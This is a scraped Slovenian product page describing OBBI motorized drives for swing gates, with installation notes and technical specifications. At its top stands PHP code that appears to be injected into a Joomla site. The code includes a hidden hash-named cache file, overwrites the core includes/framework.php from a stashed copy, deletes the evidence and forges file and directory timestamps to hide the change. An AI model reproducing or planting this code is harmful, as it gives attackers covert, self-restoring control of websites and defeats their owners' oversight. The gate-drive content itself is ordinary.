$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Avtomatska vrata - FREEZE SYSTEM - Motorizirani pogoni za krilna vrata OBBI

Motorizirani pogoni za krilna vrata OBBI

Avtomatska vrata, ki se uporabljajo v rezidenčne namene potrebujejo pogon, ki jim garantira dolgo obstojnost ter se sovpada z okolico hiše.

Motorizirani pogoni za krilna vrata OBBI so s svojim minimalističnim designom prava izbira, saj saj so primerni za vsakršna vrata, katerih širina kril ne presega 3 metre.

Vgradnja motoriziranega pogona je enostavna, zahvaljujoč se posebnim konzolam, ki so lahko nastavljene brez varjenja na idealno mesto na vratnem krilu. Motoriziran pogon lahko enostavno prestavljamo s spreminjanjem lukenj v katere se zatakne konzola.

Ob izpadu elektrike lahko z pogonom ravnamo tudi manualno s ključem ali paavtomatsko, če pogon vsebuje dodatne baterije.Pogon je prevlečen z anodiziranim aluminijem, kar mu omogoča nespremenjen izgled ne glede na vremenske spremembe.

TEHNIČNE SPECIFIKACIJE:

Description:
Electromechanical Actuator
non reversible suitable for wing up to 3 m
Maximum capacity 250 kg x 1.5 m
150 kg × 3m
Type of use frequent
Intermittency S2=30min
S3 = 50%
Motor power supply 24 V=
Input 3 A
Thrust 1500 N
Opening time 25 s/90°
Max stroke 350 mm
Maximum opening 110°
Release for manual opening by key
Operating temperature -20°C / +55°C
Protection degree IP 54
Product dimensions 110x200x995